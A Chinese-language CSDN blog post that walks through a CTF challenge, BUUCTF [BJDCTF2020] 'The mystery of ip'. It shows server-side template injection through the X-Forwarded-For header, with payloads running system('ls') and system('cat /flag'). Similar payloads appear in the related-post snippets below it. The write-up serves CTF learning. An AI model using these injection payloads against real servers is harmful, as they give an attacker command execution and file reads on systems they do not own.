BUUCTF [BJDCTF2020] The mystery of ip

最新推荐文章于 2024-06-16 22:23:21 发布
最新推荐文章于 2024-06-16 22:23:21 发布
阅读量1.6k 收藏 8
点赞数 2
分类专栏: BUUCTF WEB Writeup 文章标签: BUUCTF BJDCTF2020 The mystery ip writeup CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/111410565
版权

BUUCTF [BJDCTF2020] The mystery of ip

考点:

  1. X-Forwarded-For注入
  2. PHP可能存在Twig模版注入漏洞

启动环境:
在这里插入图片描述
查看flag页面:
在这里插入图片描述

查看hint页面:
在这里插入图片描述
结合题目名,IP的秘密,flag页面也出现了IP,猜测为X-Forwarded-For处有问题
使用BurpSuite抓取数据包:
在这里插入图片描述
添加HTTP请求头:

X-Forwarded-For: 1

在这里插入图片描述
发送数据包,得到回显页面:
在这里插入图片描述
被成功执行,说明XFF可控,测试了半天,因为是php页面,所以没想到模版注入,通过查阅资料
Flask可能存在Jinjia2模版注入漏洞
PHP可能存在Twig模版注入漏洞

添加模版算式,检测其是否可被执行:

X-Forwarded-For: {{7*7}}

在这里插入图片描述
模版中算式被成功执行,尝试是否能执行命令:

X-Forwarded-For: {{system('ls')}}

在这里插入图片描述
命令可以被成功执行,查找flag的位置:

X-Forwarded-For: {{system('ls /')}}

在这里插入图片描述
/目录下查找到flag,读取flag,构造payload:

X-Forwarded-For: {{system('cat /flag')}}

发送数据包,得到flag:
在这里插入图片描述

Senimo_
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
The Mystery of Legend-开源
06-28
《神秘的传说——开源》是一款深受玩家喜爱的JRPG风格游戏,它的开源特性为开发者和玩家带来了无限的可能性。本文将深入探讨开源软件的概念及其在游戏开发中的应用,以及《神秘的传说》如何利用这一特点来增强游戏...
The Mystery
06-23
《谜男方法》完全中文...总的来说,"The Mystery Method_cn.rar"提供的资源可以帮助读者深入了解并实践社交技巧,尤其是约会和吸引异性的艺术。同时,173软件下载的相关信息则为用户提供了获取和安装电脑软件的途径。
web buuctf [BJDCTF2020]The mystery of ip1
weixin_44214568的博客
03-24 894
考点:ssti模板注入 1.打开网页,先到hint里看有没有线索,查看源代码里面有一个注释内容是 <!-- Do you know why i know your ip? --> 应该是和ip的来源有关系,很有可能是和xff有关; 查看flag,就是一个ip地址 抓包后,在消息头添加X-Forwarded-For,设置参数值为1.1.1.1,发现回显出来的ip变成了1.1.1.1 2.怀疑可能存在xff注入,在后面加' 加or '1=1' 都回显的是本身的内容,联想是否存在模板
BUUCTF:[BJDCTF2020]The mystery of ip---------SSTI py
Zero_Adam的博客
02-13 270
这个题,思路没想到,题做少了,,, 不足: 没有看出思路来。没有想到是ssti 关键字测试的时候system(‘ls’) system('ls / ')。别tm憨憨地写个system放那就不管了,,,憨球 对ssti太不重视,只知道看一个jinja2的模板,,不知道又Twig模板注入漏洞。 WP 这里一直说IP。就抓包加上 X-Forearded-For :127.0.0.1. 跟着变化了,XFF可控,但因为是PHP页面,所以没有想到使ssti。后来才知道 Flask 可能存在 jinja2模板注入
[BJDCTF2020]The mystery of ip1
最新发布
m0_73673698的博客
06-16 143
然后在尝试a{*comment*}b和{{7*7}},如果a{*comment*}b返回ab的话就是smarty模板,尝试(这里{**}是注释符的意思,所以会直接被省略)利用{if}标签来进行注入,在XFF处输入{if phpinfo()}{/if},可以看到成功执行。看一下flag页面返回了咱们的ip,那么接下来burpsuite抓包,构造XFF然后进行判断。发现存在ssti注入漏洞,然后进行判断是什么模板,上张图。发现在根目录存在flag,cat /flag得到flag。
[BJDCTF2020]The mystery of ip 1
qq_43618536的博客
07-04 621
BUUCTF的[BJDCTF2020]The mystery of ip 1
BUUCTF:[BJDCTF]Themystery of ip
weixin_74911687的博客
03-05 119
[BJDCTF]Themystery of ip
BUUCTF-web类-[BJDCTF2020]The mystery of ip
weixin_44622228的博客
04-19 1533
BUUCTF-web类-[BJDCTF2020]The mystery of ip 这是一道很有意思的题目。 靶机首页 有Flag和Hint按钮,查看Flag试试 发现有我们本机IP的回显,很有可能是http请求头中有XFF信息将我们ip一起带过去了,我们先试试伪造XFF头看看情况。 发现确实是会变化,第一步猜想有没有可能是XFF注入? 我简单了在xff后面加了单引号,也在sqlmap上跑了一下,...
Mystery of Mobile Data Collecting AND Processing》PDF版本下载.txt
07-17
Mystery of Mobile Data Collecting AND Processing》PDF版本下载
【精品】备考2011高效学习方案英语高三册:Units 13~14  The mystery of the Moonstone & Zoology.doc
08-19
文档标题和描述提到了"备考2011高效学习方案英语高三册:Units 13~14 The mystery of the Moonstone & Zoology",这是一个针对2011年高考英语复习的学习方案,重点关注两个主题:《月亮石之谜》(The mystery of ...
The Art of Linux Kernel Design
09-15
It removes the mystery, revealing operating system design guidelines, explaining the BIOS code directly related to the operating system, and simplifying the relationships and guiding ideology behind ...
buuctf-The mystery of ip
m0_62094846的博客
04-04 2536
三个界面,有用的就是第二个,显示了ip地址,可以用bp抓包看看是哪里可以查出ip地址 但是bp里没有找到相关的东西,就只能猜,和ip地址有关的是X-Forwarded-For,但是这里没有,就自己加一个(我看到有人的wp里可以在bp的某个地方找到,但是我没找到) 改写成功 可以添加命令 有flag.php 发现这是个假的flag(被绕进去了,之前没见过这样的) 出现了flag,试一试 ...
[BJDCTF2020]The mystery of ip(ssti模板注入题目)
m0_55109452的博客
06-02 1772
项目场景: 链接http://node3.buuoj.cn:29669/index.php 问题描述: 观察页面找到三个链接,点开flag和hint看看,发现flag那个页面窃取了客户端的ip地址,这题的题目是“The mystery of ipIP的神秘,看来解题是要从这里入手了。 尝试解决: 既然是窃取了IP,考虑是不是XFF或Client-IP这两个header,发现这个IP确实可控,0.0,感觉可以冲了 我想到的第一个就是之前看到的sql注入的http头注入,但是也只是想想罢了,再看看其他方
[BJDCTF2020]The mystery of ip
qq_53689523的博客
03-18 275
总结:本题是一道X-Forwarded-For题目,服务器端获取客户端的ip通过X-Forwarded-For,通过其传递参数可能会被服务器端执行。5.Brup抓包,添加X-Forwarded-For字段,看输出是否有变化。服务器端获取客户端的ip,一般是通过X-Forwarded-For。提示:你知道我是怎么获得你的ip的吗?2.点击hint,获得提示。3.右键,检查页面源代码。
BUUCTF The mystery of ip
CyhDl666的博客
03-04 341
PHP 的SSTI模板注入 进去你看到了一个唯美的页面 你会情不自禁的去点Flag 它告诉你你的IP地址 不过好像不是我的IP地址吧 接着就点了HINT 查看源码 什么都没发现 看了wp 发现古怪在X-Forwarded-For 抓个包 添加 X-Forwarded-For: {{127.0.0.1}} 学着python的模板注入 瞎搞了几下 {system("ls /")} {system("cat /flag")} ...
web:[BJDCTF2020]The mystery of ip(ssti模板注入、Smarty 模板引擎)
sleepywin的博客
12-30 540
这里尝试抓包加上X-Forwarded-For请求头修改为127.0.0.1。尝试了{{config}}报错,报错信息显示smarty模板引擎。输入{{2*2}},回显4,确定为ssti注入。直接cat发现有两个flag,真的在根目录下。这里发现输入什么就回显什么,存在ip伪造。在hint.php的源代码页面中发现。了解一下smarty模板引擎。由题目可以知道要从ip入手。点击flag页面得到ip
buuctf-[BJDCTF2020]The mystery of ip(小宇特详解)
小宇的web博客
02-10 2200
buuctf-[BJDCTF2020]The mystery of ip(小宇特详解) 1.先看题目 这里找不到线索就抓包找 依次找flag.php,hint.php,index.php. 2.这里重新抓包flag.php进行分析 这里在重发器中加入client-ip:66尝试修改ip 这里会发现能够修改flag中的ip 这里想到命令执行 尝试系统命令client-ip:{system(‘ls’)}发现可以,然后尝试client-ip:{system(‘cat/flag’)} ...
[bjdctf2020]the mystery of ip
03-16
这是一道关于IP地址的谜题,需要我们了解IP地址的基本知识和相关的网络协议。通过分析题目中给出的IP地址和端口号,我们可以推测出这是一道关于TCP/IP协议的题目。我们需要使用Wireshark等网络抓包工具来捕获网络数据包,然后分析其中的IP地址和端口号,以及数据包的内容和协议类型,来解决这个谜题。同时,我们还需要了解一些常见的网络攻击和防御技术,以便更好地理解和解决这个谜题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值